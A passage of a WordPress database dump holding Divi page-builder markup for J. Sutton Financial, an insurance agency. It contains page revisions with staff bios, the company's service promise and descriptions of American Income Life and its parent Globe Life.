if that wasn\'t enough, he also leads one of the most powerful teams in our industry.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Andres-Cano.jpg\" _builder_version=\"4.20.4\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_3_text_color=\"#003372\" custom_margin=\"10%||||false|false\" global_colors_info=\"{}\"]<h3><b>Andres Cano</b></h3>\n<p><em><span style=\"font-weight: 400;\">Managing Director</span></em></p>\n<p><span style=\"font-weight: 400;\">Andres\' career with J. Sutton Financial started in the middle of the pandemic. As a recent college graduate from the University of Texas at El Paso Andres found an opportunity to excel within a troubling job market at J. Sutton Financial. Andres is currently working with his team on the expansion of our Latino Division.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','publish','closed','closed','','our-story','','','2023-04-11 21:41:05','2023-04-11 21:41:05','',0,'http://cmdev-site1.com/?page_id=702',0,'page','',0),(710,1,'2023-04-03 23:24:10','2023-04-03 23:24:10','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-03 23:24:10','2023-04-03 23:24:10','',26,'http://cmdev-site1.com/?p=710',0,'revision','',0),(704,1,'2023-04-03 23:20:57','2023-04-03 23:20:57','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_margin=\"-11px|||||\" custom_padding=\"2px||4px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|0px|auto|false|false\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" custom_margin=\"||||false|false\" custom_padding=\"30px||||false|false\" global_colors_info=\"{}\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Products & Services','','inherit','closed','closed','','26-revision-v1','','','2023-04-03 23:20:57','2023-04-03 23:20:57','',26,'http://cmdev-site1.com/?p=704',0,'revision','',0),(705,1,'2023-04-03 23:21:26','2023-04-03 23:21:26','','Our Story','','inherit','closed','closed','','702-revision-v1','','','2023-04-03 23:21:26','2023-04-03 23:21:26','',702,'http://cmdev-site1.com/?p=705',0,'revision','',0),(711,1,'2023-04-09 12:41:32','2023-04-03 23:24:23',' ','','','publish','closed','closed','','711','','','2023-04-09 12:41:32','2023-04-09 12:41:32','',0,'http://cmdev-site1.com/2023/04/03/711/',2,'nav_menu_item','',0),(712,1,'2023-04-03 23:24:23','2023-04-03 23:24:23','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" column_structure=\"3_5,2_5\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"3_5\" theme_builder_area=\"post_content\"][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_5\" theme_builder_area=\"post_content\"][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','702-revision-v1','','','2023-04-03 23:24:23','2023-04-03 23:24:23','',702,'http://cmdev-site1.com/?p=712',0,'revision','',0),(707,1,'2023-04-09 12:41:32','2023-04-03 23:22:40',' ','','','publish','closed','closed','','707','','','2023-04-09 12:41:32','2023-04-09 12:41:32','',0,'http://cmdev-site1.com/?p=707',5,'nav_menu_item','',0),(708,1,'2023-04-09 12:41:32','2023-04-03 23:22:40',' ','','','publish','closed','closed','','708','','','2023-04-09 12:41:32','2023-04-09 12:41:32','',0,'http://cmdev-site1.com/?p=708',4,'nav_menu_item','',0),(709,1,'2023-04-09 12:41:32','2023-04-03 23:22:40',' ','','','publish','closed','closed','','709','','','2023-04-09 12:41:32','2023-04-09 12:41:32','',0,'http://cmdev-site1.com/?p=709',3,'nav_menu_item','',0),(714,1,'2023-04-03 23:25:05','2023-04-03 23:25:05','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','702-revision-v1','','','2023-04-03 23:25:05','2023-04-03 23:25:05','',702,'http://cmdev-site1.com/?p=714',0,'revision','',0),(718,1,'2023-04-03 23:29:46','2023-04-03 23:29:46','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][dsm_text_divider header=\"Partners\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"font-weight: 400;\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/justinsuttonheadshotsmall-Black-White.png\" title_text=\"justinsuttonheadshotsmall Black-White\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Seth.jpg\" title_text=\"Seth\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Matthew-Sutton.jpg\" title_text=\"Matthew Sutton\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Andres-Cano.jpg\" title_text=\"Andres Cano\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','702-revision-v1','','','2023-04-03 23:29:46','2023-04-03 23:29:46','',702,'http://cmdev-site1.com/?p=718',0,'revision','',0),(717,1,'2023-04-03 23:29:26','2023-04-03 23:29:26','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</p>\n<p>We service clients and work as a team at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</p>[/et_pb_text][dsm_text_divider _builder_version=\"4.20.2\" _module_preset=\"default\" header=\"Partners\" hover_enabled=\"0\" sticky_enabled=\"0\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<p><span style=\"font-weight: 400;\">J. Sutton Financial believes in delivering a wonderful experience, enterprise professionalism, and real results. Step one to our success has always been putting our clients first. We\'re always looking to grow with the right people. Take a look below to learn more about our partners and how you, too, can join our incredible team!</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" column_structure=\"2_5,3_5\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_5\"][et_pb_image _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" title_text=\"justinsuttonheadshotsmall Black-White\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/justinsuttonheadshotsmall-Black-White.png\"][/et_pb_image][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"3_5\"][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" title_text=\"Seth\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Seth.jpg\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" column_structure=\"2_5,3_5\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_5\"][et_pb_image _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" title_text=\"Matthew Sutton\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Matthew-Sutton.jpg\"][/et_pb_image][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"3_5\"][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" column_structure=\"3_5,2_5\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"3_5\"][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"2_5\"][et_pb_image _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Andres Cano\" src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Andres-Cano.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','702-revision-v1','','','2023-04-03 23:29:26','2023-04-03 23:29:26','',702,'http://cmdev-site1.com/?p=717',0,'revision','',0),(729,1,'2023-04-03 23:46:30','2023-04-03 23:46:30','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||66px||false|false\" global_colors_info=\"{}\"][et_pb_column 